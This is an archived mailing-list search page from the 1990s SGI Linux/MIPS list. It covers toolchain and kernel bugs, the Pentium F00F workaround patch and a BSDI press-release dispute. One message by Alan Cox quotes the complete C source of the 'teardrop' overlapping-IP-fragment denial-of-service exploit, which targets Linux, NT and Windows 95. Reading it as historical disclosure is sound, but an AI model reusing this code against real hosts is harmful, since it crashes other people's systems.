All the mail mirrored from lore.kernel.org
 help / color / mirror / Atom feed
Search results ordered by [date|relevance]  view[summary|nested|Atom feed]
thread overview below | download mbox.gz: |
* bug in IRIX tftpd?
@ 1996-08-14 22:58 64% David S. Miller
  0 siblings, 0 replies; 200+ results
From: David S. Miller @ 1996-08-14 22:58 UTC (permalink / raw)
  To: linux


Wonder if someone can help me fix this problem:

Seems that the IRIX tftpd daemon will not respond correctly to
requests in binary more. I can reproduce the problem at will and it
happens every time.

I can do the transfer just fine using ascii mode, but any attempt to
use binary mode fails.  What is funny is that TFTPD places a syslog
entry that says:

Aug 14 15:57:13 6D:tanya tftpd[1373]: sandra.engr.sgi.com: read request for /tftpboot/96A64B0F.SUN4C: success

Yet tftpd does not send one packet back.  It does not matter what
machine I try to do this tftp transfer from.  ASCII mode always works,
binary mode always fails.

dm@engr.sgi.com

'Ooohh.. "FreeBSD is faster over loopback, when compared to
Linux over the wire". Film at 11.' -Linus

^ permalink raw reply	[relevance 64%]

* ignore tftp bug report
@ 1996-08-14 23:46 64% David S. Miller
  0 siblings, 0 replies; 200+ results
From: David S. Miller @ 1996-08-14 23:46 UTC (permalink / raw)
  To: linux


Duh, no one was answering tanya's ARP requests for sandra.engr

dm@engr.sgi.com

'Ooohh.. "FreeBSD is faster over loopback, when compared to
Linux over the wire". Film at 11.' -Linus

^ permalink raw reply	[relevance 64%]

* GCC bug
@ 1997-07-05 21:09 64% Ralf Baechle
  0 siblings, 0 replies; 200+ results
From: Ralf Baechle @ 1997-07-05 21:09 UTC (permalink / raw)


Hi,

the most current GCC package installs the header file assert.h although
it shouldn't.  The problem is that the GCC version of assert.h will
not include <gnu/stubs.h> but autoconf generated configure scripts
rely on that.  If you ever wondered why loading programs caused warnings
like 'the function lchown is not implemented and will always fail', this
is caused by the wrong assert.h.

Quick fix: rm <prefix>/<target>/include/assert.h, for example.
rm /usr/local/mipsel-linux/include/assert.h.  Note that this applies
to both native and crosscompilers.  None of them will install the
assert.h file in /usr/include/.

  Ralf

^ permalink raw reply	[relevance 64%]

* Bottom half bug
@ 1997-08-10  2:06 64% Ralf Baechle
  1997-08-11 23:59 64% ` Miguel de Icaza
  0 siblings, 1 reply; 200+ results
From: Ralf Baechle @ 1997-08-10  2:06 UTC (permalink / raw)
  To: linux

Hi,

seems Miguel's recently reported problem as well as the feature that
<CTRL>-S locks the machine sometimes for some seconds, sometimes
finally seem to be hidden somewhere in the bottom half handlers.

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: Bottom half bug
  1997-08-10  2:06 64% Bottom half bug Ralf Baechle
@ 1997-08-11 23:59 64% ` Miguel de Icaza
  1997-08-12  4:07 64%       ` Ralf Baechle
  0 siblings, 1 reply; 200+ results
From: Miguel de Icaza @ 1997-08-11 23:59 UTC (permalink / raw)
  To: ralf; +Cc: linux


Hello Ralf, list,

  Well, the major problem with getting gdb up was that init is for
some reason setting the blocked signal mask to 0x39 (this includes
sighup, sigtrap and a couple of others).  

  I will debug this next, right now I have this gross hack on gdb to
reset the signal mask to zero.  Any ideas of why would init be doing this?

Cheers,
Miguel.

^ permalink raw reply	[relevance 64%]

* Re: Bottom half bug
  1997-08-11 23:59 64% ` Miguel de Icaza
@ 1997-08-12  4:07 64%       ` Ralf Baechle
  0 siblings, 0 replies; 200+ results
From: Ralf Baechle @ 1997-08-12  4:07 UTC (permalink / raw)
  To: Miguel de Icaza; +Cc: ralf, linux

>   Well, the major problem with getting gdb up was that init is for
> some reason setting the blocked signal mask to 0x39 (this includes
> sighup, sigtrap and a couple of others).  
> 
>   I will debug this next, right now I have this gross hack on gdb to
> reset the signal mask to zero.  Any ideas of why would init be doing this?

Well, I'll look at this when I get off the plane or so ...

I finally tracked the problem with <CTRL>-s locking up the machine down.
It's a missing restore_flags() in the newport driver that makes the
keyboard driver bottom half go bobo.  Also we were missing irq_enter/
irq_leave in the Indy interrupt handler.  The patch, well, it's in my
suit case.  Have fun with your crashing boxes :-)

California, I'm comin',

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: Bottom half bug
@ 1997-08-12  4:07 64%       ` Ralf Baechle
  0 siblings, 0 replies; 200+ results
From: Ralf Baechle @ 1997-08-12  4:07 UTC (permalink / raw)
  To: Miguel de Icaza; +Cc: ralf, linux

>   Well, the major problem with getting gdb up was that init is for
> some reason setting the blocked signal mask to 0x39 (this includes
> sighup, sigtrap and a couple of others).  
> 
>   I will debug this next, right now I have this gross hack on gdb to
> reset the signal mask to zero.  Any ideas of why would init be doing this?

Well, I'll look at this when I get off the plane or so ...

I finally tracked the problem with <CTRL>-s locking up the machine down.
It's a missing restore_flags() in the newport driver that makes the
keyboard driver bottom half go bobo.  Also we were missing irq_enter/
irq_leave in the Indy interrupt handler.  The patch, well, it's in my
suit case.  Have fun with your crashing boxes :-)

California, I'm comin',

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: Bottom half bug
  1997-08-12  4:07 64%       ` Ralf Baechle
@ 1997-08-12 16:26 64%           ` Miguel de Icaza
  -1 siblings, 0 replies; 200+ results
From: Miguel de Icaza @ 1997-08-12 16:26 UTC (permalink / raw)
  To: ralf; +Cc: linux


> I finally tracked the problem with <CTRL>-s locking up the machine down.
> It's a missing restore_flags() in the newport driver that makes the
> keyboard driver bottom half go bobo.  Also we were missing irq_enter/
> irq_leave in the Indy interrupt handler.  The patch, well, it's in my
> suit case.  Have fun with your crashing boxes :-)

Thanks for the pointers.  They are fixed in my tree now :-).

Cheers,
Miguel.

^ permalink raw reply	[relevance 64%]

* Re: Bottom half bug
@ 1997-08-12 16:26 64%           ` Miguel de Icaza
  0 siblings, 0 replies; 200+ results
From: Miguel de Icaza @ 1997-08-12 16:26 UTC (permalink / raw)
  To: ralf; +Cc: ralf, linux


> I finally tracked the problem with <CTRL>-s locking up the machine down.
> It's a missing restore_flags() in the newport driver that makes the
> keyboard driver bottom half go bobo.  Also we were missing irq_enter/
> irq_leave in the Indy interrupt handler.  The patch, well, it's in my
> suit case.  Have fun with your crashing boxes :-)

Thanks for the pointers.  They are fixed in my tree now :-).

Cheers,
Miguel.

^ permalink raw reply	[relevance 64%]

* glibc 2.0.4 bug ...
@ 1997-09-24  7:15 64% Ralf Baechle
  1997-09-24 17:16 64% ` Ulrich Drepper
  0 siblings, 1 reply; 200+ results
From: Ralf Baechle @ 1997-09-24  7:15 UTC (permalink / raw)
  To: linux-mips, linux, drepper

Hi all,

glibc 2.0.4 contains a fatal bug.  It does not declare a prototype for
the function llseek in unistd.h.  As result GCC will (correctly) truncate
the 64 bit file offset and build erroneous filesystems when building
filesystems of 2GB.  e2fsck will complain about read errors when trying
to read blocks from the 2GB border on.  Actually I wonder why I never saw
a report about that on other mailinglists.

Quickfix: add the following prototype for llseek(2):

  extern loff_t llseek (int fd, loff_t offset, int whence);

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: glibc 2.0.4 bug ...
  1997-09-24  7:15 64% glibc 2.0.4 bug Ralf Baechle
@ 1997-09-24 17:16 64% ` Ulrich Drepper
  0 siblings, 0 replies; 200+ results
From: Ulrich Drepper @ 1997-09-24 17:16 UTC (permalink / raw)
  To: ralf; +Cc: linux-mips, linux

From: Ralf Baechle <ralf@cobaltmicro.com>
Subject: glibc 2.0.4 bug ...
Date: Wed, 24 Sep 1997 00:15:10 -0700 (PDT)

> Quickfix: add the following prototype for llseek(2):
> 
>   extern loff_t llseek (int fd, loff_t offset, int whence);

I've mentioned this several times: llseek is an internal function.
What we need is the LFS interface which then defines lseek64.

-- Uli
---------------.      drepper@cygnus.com  ,-.   Rubensstrasse 5
Ulrich Drepper  \    ,-------------------'   \  76149 Karlsruhe/Germany
Cygnus Solutions `--' drepper@gnu.ai.mit.edu  `------------------------

^ permalink raw reply	[relevance 64%]

* static rpm bug, dynamic linker
@ 1997-10-14 23:58 64% Ralf Baechle
  0 siblings, 0 replies; 200+ results
From: Ralf Baechle @ 1997-10-14 23:58 UTC (permalink / raw)
  To: linux, linux-mips

Hi all,

I spent a lot of time on fixing the dynamic linker.  The bugs Miguel
found by building native X libraries are fixed by now.  The only one
that still is still giving me a miracle to solve is the fact that
certain statically linked executables, most prominently rpm, are
failing.

I'm about to fix that one also and that long want to remind people that
static linking is a dead concept anyway.  rpm for example will load a
dynamic libc when using the nss services, so all you get is bloat while
the knowledge about the kernel interfaces embedded into the statically
linked libc makes it very difficult to improve system interfaces.

  Ralf

^ permalink raw reply	[relevance 64%]

* Pentium F00F bug Linux workaround
@ 1997-11-14 21:17 55%   ` Ariel Faigon
  0 siblings, 0 replies; 200+ results
From: Ariel Faigon @ 1997-11-14 21:17 UTC (permalink / raw)
  To: SGI/Linux mailing list

[Just forwarding from linux-dev since I thought some people
 may be interested.  Ingo Molnar has found a way to workaround
 the latest Pentium/Pentium-MMX F00F bug. Linus then improved on it.

 I'm impressed by the repeatedly demonstrated ability of the Linux
 community to beat Microsoft.  It remains to be seen how long it'll
 take Microsoft to respond to this serious bug that can crash any
 Windows/WindowsNT machine from user mode (incl. any remotely loaded
 Captive-X control)]

-------------------------------------------------------------------------

From Linus:

Ingo, Alan, others,
 I have a quick cleanup of 2.1.63 that looks a bit better wrt the F0 0F
bug, and also avoids the double SMP unlock that somebody noticed (sorry
for not giving attribution, I've been pretty rushed today trying to get
the stuff out quickly to people to test). 

I still don't have any pentium closeby to actually test this, so I'm
appending patches relative to 2.1.63. Does this still work for people with
the bug?

		Linus

-----
diff -u --recursive --new-file v2.1.63/linux/arch/i386/mm/fault.c linux/arch/i386/mm/fault.c
--- v2.1.63/linux/arch/i386/mm/fault.c	Wed Nov 12 13:34:25 1997
+++ linux/arch/i386/mm/fault.c	Wed Nov 12 13:33:48 1997
@@ -74,14 +74,6 @@
 	return 0;
 }
 
-asmlinkage void divide_error(void);
-asmlinkage void debug(void);
-asmlinkage void nmi(void);
-asmlinkage void int3(void);
-asmlinkage void overflow(void);
-asmlinkage void bounds(void);
-asmlinkage void invalid_op(void);
-
 asmlinkage void do_divide_error (struct pt_regs *, unsigned long);
 asmlinkage void do_debug (struct pt_regs *, unsigned long);
 asmlinkage void do_nmi (struct pt_regs *, unsigned long);
@@ -189,44 +181,27 @@
 		goto out;
 	}
 
-	printk(&quot;&lt;%p/%p&gt;\n&quot;, idt2, (void *)address);
 	/*
 	 * Pentium F0 0F C7 C8 bug workaround:
 	 */
-	if ( pentium_f00f_bug &amp;&amp; (address &gt;= (unsigned long)idt2) &amp;&amp;
-			(address &lt; (unsigned long)idt2+256*8) ) {
-
-		void (*handler) (void);
-		int nr = (address-(unsigned long)idt2)/8;
-		unsigned long low, high;
-
-		low = idt[nr].a;
-		high = idt[nr].b;
-
-		handler = (void (*) (void)) ((low&amp;0x0000ffff) | (high&amp;0xffff0000));
-		printk(&quot;&lt;handler %p... &quot;, handler);
-		unlock_kernel();
-
-		if (handler==divide_error)
-			do_divide_error(regs,error_code);
-		else if (handler==debug)
-			do_debug(regs,error_code);
-		else if (handler==nmi)
-			do_nmi(regs,error_code);
-		else if (handler==int3)
-			do_int3(regs,error_code);
-		else if (handler==overflow)
-			do_overflow(regs,error_code);
-		else if (handler==bounds)
-			do_bounds(regs,error_code);
-		else if (handler==invalid_op)
-			do_invalid_op(regs,error_code);
-		else {
-			printk(&quot;INVALID HANDLER!\n&quot;);
-			for (;;) __cli();
+	if ( pentium_f00f_bug ) {
+		unsigned long nr;
+		
+		nr = (address - (unsigned long) idt2) &gt;&gt; 3;
+
+		if (nr &lt; 7) {
+			static void (*handler[])(struct pt_regs *, unsigned long) = {
+				do_divide_error,	/* 0 - divide overflow */
+				do_debug,		/* 1 - debug trap */
+				do_nmi,			/* 2 - NMI */
+				do_int3,		/* 3 - int 3 */
+				do_overflow,		/* 4 - overflow */
+				do_bounds,		/* 5 - bound range */
+				do_invalid_op };	/* 6 - invalid opcode */
+			unlock_kernel();
+			handler[nr](regs, error_code);
+			return;
 		}
-		printk(&quot;... done&gt;\n&quot;);
-		goto out;
 	}
 
 	/* Are we prepared to handle this kernel fault?  */


-- 
Peace, Ariel

^ permalink raw reply	[relevance 55%]

* Pentium F00F bug Linux workaround
@ 1997-11-14 21:17 55%   ` Ariel Faigon
  0 siblings, 0 replies; 200+ results
From: Ariel Faigon @ 1997-11-14 21:17 UTC (permalink / raw)
  To: SGI/Linux mailing list

[Just forwarding from linux-dev since I thought some people
 may be interested.  Ingo Molnar has found a way to workaround
 the latest Pentium/Pentium-MMX F00F bug. Linus then improved on it.

 I'm impressed by the repeatedly demonstrated ability of the Linux
 community to beat Microsoft.  It remains to be seen how long it'll
 take Microsoft to respond to this serious bug that can crash any
 Windows/WindowsNT machine from user mode (incl. any remotely loaded
 Captive-X control)]

-------------------------------------------------------------------------

>From Linus:

Ingo, Alan, others,
 I have a quick cleanup of 2.1.63 that looks a bit better wrt the F0 0F
bug, and also avoids the double SMP unlock that somebody noticed (sorry
for not giving attribution, I've been pretty rushed today trying to get
the stuff out quickly to people to test). 

I still don't have any pentium closeby to actually test this, so I'm
appending patches relative to 2.1.63. Does this still work for people with
the bug?

		Linus

-----
diff -u --recursive --new-file v2.1.63/linux/arch/i386/mm/fault.c linux/arch/i386/mm/fault.c
--- v2.1.63/linux/arch/i386/mm/fault.c	Wed Nov 12 13:34:25 1997
+++ linux/arch/i386/mm/fault.c	Wed Nov 12 13:33:48 1997
@@ -74,14 +74,6 @@
 	return 0;
 }
 
-asmlinkage void divide_error(void);
-asmlinkage void debug(void);
-asmlinkage void nmi(void);
-asmlinkage void int3(void);
-asmlinkage void overflow(void);
-asmlinkage void bounds(void);
-asmlinkage void invalid_op(void);
-
 asmlinkage void do_divide_error (struct pt_regs *, unsigned long);
 asmlinkage void do_debug (struct pt_regs *, unsigned long);
 asmlinkage void do_nmi (struct pt_regs *, unsigned long);
@@ -189,44 +181,27 @@
 		goto out;
 	}
 
-	printk(&quot;&lt;%p/%p&gt;\n&quot;, idt2, (void *)address);
 	/*
 	 * Pentium F0 0F C7 C8 bug workaround:
 	 */
-	if ( pentium_f00f_bug &amp;&amp; (address &gt;= (unsigned long)idt2) &amp;&amp;
-			(address &lt; (unsigned long)idt2+256*8) ) {
-
-		void (*handler) (void);
-		int nr = (address-(unsigned long)idt2)/8;
-		unsigned long low, high;
-
-		low = idt[nr].a;
-		high = idt[nr].b;
-
-		handler = (void (*) (void)) ((low&amp;0x0000ffff) | (high&amp;0xffff0000));
-		printk(&quot;&lt;handler %p... &quot;, handler);
-		unlock_kernel();
-
-		if (handler==divide_error)
-			do_divide_error(regs,error_code);
-		else if (handler==debug)
-			do_debug(regs,error_code);
-		else if (handler==nmi)
-			do_nmi(regs,error_code);
-		else if (handler==int3)
-			do_int3(regs,error_code);
-		else if (handler==overflow)
-			do_overflow(regs,error_code);
-		else if (handler==bounds)
-			do_bounds(regs,error_code);
-		else if (handler==invalid_op)
-			do_invalid_op(regs,error_code);
-		else {
-			printk(&quot;INVALID HANDLER!\n&quot;);
-			for (;;) __cli();
+	if ( pentium_f00f_bug ) {
+		unsigned long nr;
+		
+		nr = (address - (unsigned long) idt2) &gt;&gt; 3;
+
+		if (nr &lt; 7) {
+			static void (*handler[])(struct pt_regs *, unsigned long) = {
+				do_divide_error,	/* 0 - divide overflow */
+				do_debug,		/* 1 - debug trap */
+				do_nmi,			/* 2 - NMI */
+				do_int3,		/* 3 - int 3 */
+				do_overflow,		/* 4 - overflow */
+				do_bounds,		/* 5 - bound range */
+				do_invalid_op };	/* 6 - invalid opcode */
+			unlock_kernel();
+			handler[nr](regs, error_code);
+			return;
 		}
-		printk(&quot;... done&gt;\n&quot;);
-		goto out;
 	}
 
 	/* Are we prepared to handle this kernel fault?  */


-- 
Peace, Ariel

^ permalink raw reply	[relevance 55%]

* Re: Pentium F00F bug Linux workaround
  1997-11-14 21:17 55%   ` Ariel Faigon
  (?)
@ 1997-11-14 21:49 64%   ` David S. Miller
  -1 siblings, 0 replies; 200+ results
From: David S. Miller @ 1997-11-14 21:49 UTC (permalink / raw)
  To: ariel; +Cc: linux


We also got some good press from it pretty fast after we released the
fixes:

http://www.news.com/News/Item/0,4,16312,00.html

Whats extremely humorous is that BSDI signed an NDA with Intel to get
early fix techniques told to them by Intel engineers.  But the NDA
stated they could not release patch sets for BSDI until Intel said so,
the thinking on Intel's part is that they wanted nobody to be the
first with a fix.  BSDI overlooked this and put the fix out, then
quickly took the fixes down once they released they had breached the
Intel NDA.

After the Linux fix was already out, Intel engineers spoke with Linus
and tried to get him to sign an NDA, I've never laughed so hard in my
life.

Later,
David S. Miller
davem@dm.cobaltmicro.com

^ permalink raw reply	[relevance 64%]

* Re: Pentium F00F bug Linux workaround
  1997-11-14 21:17 55%   ` Ariel Faigon
  (?)
  (?)
@ 1997-11-14 22:01 64%   ` ralf
  -1 siblings, 0 replies; 200+ results
From: ralf @ 1997-11-14 22:01 UTC (permalink / raw)
  To: Ariel Faigon; +Cc: SGI/Linux mailing list

On Fri, Nov 14, 1997 at 01:17:24PM -0800, Ariel Faigon wrote:
> [Just forwarding from linux-dev since I thought some people
>  may be interested.  Ingo Molnar has found a way to workaround
>  the latest Pentium/Pentium-MMX F00F bug. Linus then improved on it.
> 
>  I'm impressed by the repeatedly demonstrated ability of the Linux
>  community to beat Microsoft.  It remains to be seen how long it'll
>  take Microsoft to respond to this serious bug that can crash any
>  Windows/WindowsNT machine from user mode (incl. any remotely loaded
>  Captive-X control)]

The Linux kernel as well handles a CPU bug that QED / IDT still haven't
acknowledged to exist :-)

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: Pentium F00F bug Linux workaround
  1997-11-14 21:17 55%   ` Ariel Faigon
                     ` (2 preceding siblings ...)
  (?)
@ 1997-11-14 22:25 45%   ` Alan Cox
  -1 siblings, 0 replies; 200+ results
From: Alan Cox @ 1997-11-14 22:25 UTC (permalink / raw)
  To: ariel; +Cc: linux

>  I'm impressed by the repeatedly demonstrated ability of the Linux
>  community to beat Microsoft.  It remains to be seen how long it'll
>  take Microsoft to respond to this serious bug that can crash any
>  Windows/WindowsNT machine from user mode (incl. any remotely loaded
>  Captive-X control)]

For various complex political/vendor reasons between intel and OS vendors
the situation on this is somewhat misleading on speed of fixing. Don't take
this specific one as a fair measurement. 

Lets see how long they take to fix the one below..  (Linux fix in 2.1.64pre
and on various sites). Irix isnt vulnerable btw ;)

Alan

/*
 *  Copyright (c) 1997 route|daemon9  <route@infonexus.com11.3.97
 *
 *  Linux/NT/95 Overlap frag bug exploit
 *
 *  Exploits the overlapping IP fragment bug present in all Linux kernels and
 *  NT 4.0 / Windows 95 (others?)
 *
 *  Based off of:   flip.c by klepto
 *  Compiles on:    Linux, *BSD*
 *
 *  gcc -O2 teardrop.c -o teardrop
 *      OR
 *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x1c    /* datagram frame padding for first packet */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

/* EOF */

^ permalink raw reply	[relevance 45%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
@ 1997-11-17 21:28 51%   ` William Fisher
  0 siblings, 0 replies; 200+ results
From: William Fisher @ 1997-11-17 21:28 UTC (permalink / raw)
  To: linux; +Cc: William Fisher

Here is the response I got from BSDI on the Pentium F00F bug fix.

-- Bill
-----------------------
From dab@frantic.BSDI.COM  Sat Nov 15 09:32:26 1997
Date: Sat, 15 Nov 1997 11:32:42 -0600 (CST)
From: David Borman <dab@BSDI.COM>
Message-Id: <199711151732.LAA17129@frantic.BSDI.COM>
To: fisher@sgi.com
Subject: Re: Pentium F00F bug Linux workaround

Hi Bill,

> Is this true that:
> 
> "BSDI signed an NDA with Intel to get early fix techniques"?
> 
> ...
> Subject: Re: Pentium F00F bug Linux workaround
> References:  <199711142117.NAA27890@.....>
> Sender: owner-linux@cthulhu
> Precedence: bulk
> 
> We also got some good press from it pretty fast after we released the fixes:
> 
> http://www.news.com/News/Item/0,4,16312,00.html
> 
> Whats extremely humorous is that BSDI signed an NDA with Intel to get
> early fix techniques told to them by Intel engineers.  But the NDA
> stated they could not release patch sets for BSDI until Intel said so,
> the thinking on Intel's part is that they wanted nobody to be the
> first with a fix.  BSDI overlooked this and put the fix out, then
> quickly took the fixes down once they released they had breached the
> Intel NDA.
> 
> After the Linux fix was already out, Intel engineers spoke with Linus
> and tried to get him to sign an NDA, I've never laughed so hard in my life.
>
Hmm... The Linux message is not accurate.  At no time has BSDI violated
any agreements with Intel.  The first patch that we put up was a beta
patch.  It solves the problem, but we made some minor improvements on
it in our official patch.

I'll also point out that Intel called us.  From our official patch:

	BSDI has worked closely with Intel since they contacted us about
	this erratum. We were able to develop a workaround for BSD/OS very
	quickly, and Intel's assistance was invaluable in this process.
	BSDI is confident that the software workaround solves this problem
	for our customers.
	...
	Thanks to Intel Corporation for contacting BSDI with data that
	led to the fix.

Also, though I don't personally have anything to support this, it is our
understanding that the Linux fix was based at least in part upon
disassembling our beta patch.

I've attached our "press release".

		-David Borman, dab@bsdi.com


FOR IMMEDIATE RELEASE
Contact:	Donna Faulkner
		Baron, McDonald & Wells
		770/492-0373
		dfaulkner@bmwpr.com

First Intel Pentium Processor 'F0' Bug Fix Announced for BSDI ISP Customers

ISPs and other users of BSD/OS can be protected against system 'freezes'
caused by illegal code strings 

COLORADO SPRINGS, Co.  (November 17, 1997)

Internet Service Providers (ISPs) and other users of the BSD/OS can now protect themselves against problems associated with the 'F0' bug discovered in Intel's Pentium processor.  Berkeley Software Design, Inc. (BSDI) today announced a patch that protects companies running BSD/OS 3.1, 3.0, 2.1 against system freezes caused when the processor receives an illegal, one-line instruction.  
	BSDI's patch enables the BSD/OS to gain control whenever an invalid sequence is executed, enabling the system to take its normal action in response to illegal instructions.  The patch offers a solution to more than 7,000 organizations and companies relying on the BSD/OS, including over 3,000 ISPs worldwide.  ISPs are particularly vulnerable to system attacks based on the Pentium processor bug, since any user or subscriber with malicious intent has the potential to create a system-wide hang-up.

	"BSDI has developed an outstanding reputation for rapid response to attacks," said Mike Karels, vice president of engineering for BSDI.  "Last summer, we were the first commercial vendor to provide a defense against 'SYN-flooding' attacks.  This week, we have once again demonstrated industry-leading support for our customers."

The BSD/OS patch is downloadable from the company's web site at
	http://www.bsdi.com. 
Berkeley Software Design, Inc. is the commercial supplier of the
high-performance BSD Internet and networking system software originally
developed at the University of California, Berkeley.

Internet experts worldwide are powering the networked economy with over 75,000 deployed servers running BSDI software engines and applications.  BSDI products for Intel-based PC platforms include the BSDI Internet Server, BSD/OS, and network software for networking appliance developers.  BSDI customers include Adobe Systems, Chase Manhattan Bank, CompuServe, U.S. West, UUNET Technologies, Volvo, and leading Internet Service Providers worldwide.  BSDI is privately held and headquartered in Colorado Springs, Colorado.  Contact BSDI at 719-593-9445, info@bsdi.com or http://www.bsdi.com.

BSDI, BSD/OS and the BSDI logo are trademarks of Berkeley Software Design, Inc.  All other product or service names are trademarks of their respective owners.

^ permalink raw reply	[relevance 50%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
@ 1997-11-17 21:28 51%   ` William Fisher
  0 siblings, 0 replies; 200+ results
From: William Fisher @ 1997-11-17 21:28 UTC (permalink / raw)
  To: linux; +Cc: William Fisher

Here is the response I got from BSDI on the Pentium F00F bug fix.

-- Bill
-----------------------
>From dab@frantic.BSDI.COM  Sat Nov 15 09:32:26 1997
Date: Sat, 15 Nov 1997 11:32:42 -0600 (CST)
From: David Borman <dab@BSDI.COM>
Message-Id: <199711151732.LAA17129@frantic.BSDI.COM>
To: fisher@sgi.com
Subject: Re: Pentium F00F bug Linux workaround

Hi Bill,

> Is this true that:
> 
> "BSDI signed an NDA with Intel to get early fix techniques"?
> 
> ...
> Subject: Re: Pentium F00F bug Linux workaround
